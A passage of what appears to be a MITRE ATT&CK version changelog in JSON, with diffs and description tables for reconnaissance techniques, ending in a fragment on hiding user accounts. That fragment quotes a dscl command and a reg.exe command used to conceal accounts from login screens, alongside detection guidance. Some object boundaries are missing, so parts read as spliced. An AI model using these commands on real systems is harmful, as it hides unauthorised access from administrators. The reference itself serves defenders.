"description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
"url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
},
{
"source_name": "ThreatConnect Infrastructure Dec 2020",
"description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
"url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Internet Scan: Response Content"
],
"x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 16:35:09.668000+00:00\", \"old_value\": \"2021-04-15 03:22:14.288000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n\\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"old_value\": \"Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n\\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n+Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n \\n-Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\\n+Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"ThreatConnect Infrastructure Dec 2020\", \"description\": \"ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.\", \"url\": \"https://threatconnect.com/blog/infrastructure-research-hunting/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0035: Internet Scan (Response Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-02 16:40:47.488000+00:00",
"modified": "2021-10-17 16:32:10.810000+00:00",
"name": "Hardware",
"description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "reconnaissance"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1592/001",
"external_id": "T1592.001"
},
{
"source_name": "ATT ScanBox",
"description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
"url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
},
{
"source_name": "ThreatConnect Infrastructure Dec 2020",
"description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
"url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Internet Scan: Response Content"
],
"x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 16:32:10.810000+00:00\", \"old_value\": \"2021-04-15 03:23:21.031000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n\\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"old_value\": \"Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n\\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n+Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n \\n-Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\\n+Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"ThreatConnect Infrastructure Dec 2020\", \"description\": \"ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.\", \"url\": \"https://threatconnect.com/blog/infrastructure-research-hunting/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0035: Internet Scan (Response Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-02 16:42:17.482000+00:00",
"modified": "2021-10-17 16:33:19.596000+00:00",
"name": "Software",
"description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "reconnaissance"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1592/002",
"external_id": "T1592.002"
},
{
"source_name": "ATT ScanBox",
"description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
"url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
},
{
"source_name": "ThreatConnect Infrastructure Dec 2020",
"description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
"url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Internet Scan: Response Content"
],
"x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 16:33:19.596000+00:00\", \"old_value\": \"2021-04-15 03:23:57.876000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n\\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"old_value\": \"Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n\\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n+Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n \\n-Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\\n+Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"ThreatConnect Infrastructure Dec 2020\", \"description\": \"ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.\", \"url\": \"https://threatconnect.com/blog/infrastructure-research-hunting/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0035: Internet Scan (Response Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-02 16:27:02.339000+00:00",
"modified": "2021-08-27 15:37:09.343000+00:00",
"name": "Gather Victim Org Information",
"description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "reconnaissance"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1591",
"external_id": "T1591"
},
{
"source_name": "ThreatPost Broadvoice Leak",
"description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.",
"url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"
},
{
"source_name": "SEC EDGAR Search",
"description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.",
"url": "https://www.sec.gov/edgar/search-and-access"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-27 15:37:09.343000+00:00\", \"old_value\": \"2021-04-15 03:39:09.021000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\\n\\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\", \"old_value\": \"Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\\n\\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\\n \\n-Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\\n+Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"SEC EDGAR Search\", \"old_value\": \"DOB Business Lookup\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.\", \"old_value\": \"Concert Technologies . (n.d.). Business Lookup - Company Name Search. Retrieved October 20, 2020.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://www.sec.gov/edgar/search-and-access\", \"old_value\": \"https://www.dobsearch.com/business-lookup/\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may gather information about the victim's organi | t | 1 | Adversaries may gather information about the victim's organi |
| > | zation that can be used during targeting. Information about | > | zation that can be used during targeting. Information about | ||
| > | an organization may include a variety of details, including | > | an organization may include a variety of details, including | ||
| > | the names of divisions/departments, specifics of business op | > | the names of divisions/departments, specifics of business op | ||
| > | erations, as well as the roles and responsibilities of key e | > | erations, as well as the roles and responsibilities of key e | ||
| > | mployees. Adversaries may gather this information in variou | > | mployees. Adversaries may gather this information in variou | ||
| > | s ways, such as direct elicitation via [Phishing for Informa | > | s ways, such as direct elicitation via [Phishing for Informa | ||
| > | tion](https://attack.mitre.org/techniques/T1598). Informatio | > | tion](https://attack.mitre.org/techniques/T1598). Informatio | ||
| > | n about an organization may also be exposed to adversaries v | > | n about an organization may also be exposed to adversaries v | ||
| > | ia online or other accessible data sets (ex: [Social Media]( | > | ia online or other accessible data sets (ex: [Social Media]( | ||
| > | https://attack.mitre.org/techniques/T1593/001) or [Search Vi | > | https://attack.mitre.org/techniques/T1593/001) or [Search Vi | ||
| > | ctim-Owned Websites](https://attack.mitre.org/techniques/T15 | > | ctim-Owned Websites](https://attack.mitre.org/techniques/T15 | ||
| > | 94)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Bu | > | 94)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC ED | ||
| > | siness Lookup) Gathering this information may reveal opportu | > | GAR Search) Gathering this information may reveal opportunit | ||
| > | nities for other forms of reconnaissance (ex: [Phishing for | > | ies for other forms of reconnaissance (ex: [Phishing for Inf | ||
| > | Information](https://attack.mitre.org/techniques/T1598) or [ | > | ormation](https://attack.mitre.org/techniques/T1598) or [Sea | ||
| > | Search Open Websites/Domains](https://attack.mitre.org/techn | > | rch Open Websites/Domains](https://attack.mitre.org/techniqu | ||
| > | iques/T1593)), establishing operational resources (ex: [Esta | > | es/T1593)), establishing operational resources (ex: [Establi | ||
| > | blish Accounts](https://attack.mitre.org/techniques/T1585) o | > | sh Accounts](https://attack.mitre.org/techniques/T1585) or [ | ||
| > | r [Compromise Accounts](https://attack.mitre.org/techniques/ | > | Compromise Accounts](https://attack.mitre.org/techniques/T15 | ||
| > | T1586)), and/or initial access (ex: [Phishing](https://attac | > | 86)), and/or initial access (ex: [Phishing](https://attack.m | ||
| > | k.mitre.org/techniques/T1566) or [Trusted Relationship](http | > | itre.org/techniques/T1566) or [Trusted Relationship](https:/ | ||
| > | s://attack.mitre.org/techniques/T1199)). | > | /attack.mitre.org/techniques/T1199)). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may gather the victim's physical location(s) tha | t | 1 | Adversaries may gather the victim's physical location(s) tha |
| > | t can be used during targeting. Information about physical l | > | t can be used during targeting. Information about physical l | ||
| > | ocations of a target organization may include a variety of d | > | ocations of a target organization may include a variety of d | ||
| > | etails, including where key resources and infrastructure are | > | etails, including where key resources and infrastructure are | ||
| > | housed. Physical locations may also indicate what legal jur | > | housed. Physical locations may also indicate what legal jur | ||
| > | isdiction and/or authorities the victim operates within. Ad | > | isdiction and/or authorities the victim operates within. Ad | ||
| > | versaries may gather this information in various ways, such | > | versaries may gather this information in various ways, such | ||
| > | as direct elicitation via [Phishing for Information](https:/ | > | as direct elicitation via [Phishing for Information](https:/ | ||
| > | /attack.mitre.org/techniques/T1598). Physical locations of a | > | /attack.mitre.org/techniques/T1598). Physical locations of a | ||
| > | target organization may also be exposed to adversaries via | > | target organization may also be exposed to adversaries via | ||
| > | online or other accessible data sets (ex: [Search Victim-Own | > | online or other accessible data sets (ex: [Search Victim-Own | ||
| > | ed Websites](https://attack.mitre.org/techniques/T1594) or [ | > | ed Websites](https://attack.mitre.org/techniques/T1594) or [ | ||
| > | Social Media](https://attack.mitre.org/techniques/T1593/001) | > | Social Media](https://attack.mitre.org/techniques/T1593/001) | ||
| > | ).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Busin | > | ).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR | ||
| > | ess Lookup) Gathering this information may reveal opportunit | > | Search) Gathering this information may reveal opportunities | ||
| > | ies for other forms of reconnaissance (ex: [Phishing for Inf | > | for other forms of reconnaissance (ex: [Phishing for Inform | ||
| > | ormation](https://attack.mitre.org/techniques/T1598) or [Sea | > | ation](https://attack.mitre.org/techniques/T1598) or [Search | ||
| > | rch Open Websites/Domains](https://attack.mitre.org/techniqu | > | Open Websites/Domains](https://attack.mitre.org/techniques/ | ||
| > | es/T1593)), establishing operational resources (ex: [Develop | > | T1593)), establishing operational resources (ex: [Develop Ca | ||
| > | Capabilities](https://attack.mitre.org/techniques/T1587) or | > | pabilities](https://attack.mitre.org/techniques/T1587) or [O | ||
| > | [Obtain Capabilities](https://attack.mitre.org/techniques/T | > | btain Capabilities](https://attack.mitre.org/techniques/T158 | ||
| > | 1588)), and/or initial access (ex: [Phishing](https://attack | > | 8)), and/or initial access (ex: [Phishing](https://attack.mi | ||
| > | .mitre.org/techniques/T1566) or [Hardware Additions](https:/ | > | tre.org/techniques/T1566) or [Hardware Additions](https://at | ||
| > | /attack.mitre.org/techniques/T1200)). | > | tack.mitre.org/techniques/T1200)). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may introduce computer accessories, computers, o | t | 1 | Adversaries may introduce computer accessories, computers, o |
| > | r networking hardware into a system or network that can be u | > | r networking hardware into a system or network that can be u | ||
| > | sed as a vector to gain access. While public references of u | > | sed as a vector to gain access. While public references of u | ||
| > | sage by APT groups are scarce, many penetration testers leve | > | sage by threat actors are scarce, many red teams/penetration | ||
| > | rage hardware additions for initial access. Commercial and o | > | testers leverage hardware additions for initial access. Com | ||
| > | pen source products are leveraged with capabilities such as | > | mercial and open source products can be leveraged with capab | ||
| > | passive network tapping (Citation: Ossmann Star Feb 2011), m | > | ilities such as passive network tapping (Citation: Ossmann S | ||
| > | an-in-the middle encryption breaking (Citation: Aleks Weapon | > | tar Feb 2011), network traffic modification (i.e. [Adversary | ||
| > | s Nov 2015), keystroke injection (Citation: Hak5 RubberDuck | > | -in-the-Middle](https://attack.mitre.org/techniques/T1557)) | ||
| > | Dec 2016), kernel memory reading via DMA (Citation: Frisk DM | > | (Citation: Aleks Weapons Nov 2015), keystroke injection (Cit | ||
| > | A August 2016), adding new wireless access to an existing ne | > | ation: Hak5 RubberDuck Dec 2016), kernel memory reading via | ||
| > | twork (Citation: McMillan Pwn March 2012), and others. | > | DMA (Citation: Frisk DMA August 2016), addition of new wirel | ||
| > | ess access to an existing network (Citation: McMillan Pwn Ma | ||||
| > | rch 2012), and others. |
/Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\n\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user \u201ctest\u201d from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1564/002",
"external_id": "T1564.002"
},
{
"source_name": "Cybereason OSX Pirrit",
"description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.",
"url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
},
{
"source_name": "FireEye SMOKEDHAM June 2021",
"description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
},
{
"source_name": "US-CERT TA18-074A",
"description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.",
"url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Omkar Gudhate"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Windows Registry: Windows Registry Key Modification",
"Process: Process Creation",
"User Account: User Account Creation",
"User Account: User Account Metadata",
"File: File Modification"
],
"x_mitre_detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.",
"x_mitre_is_subtechnique": true,
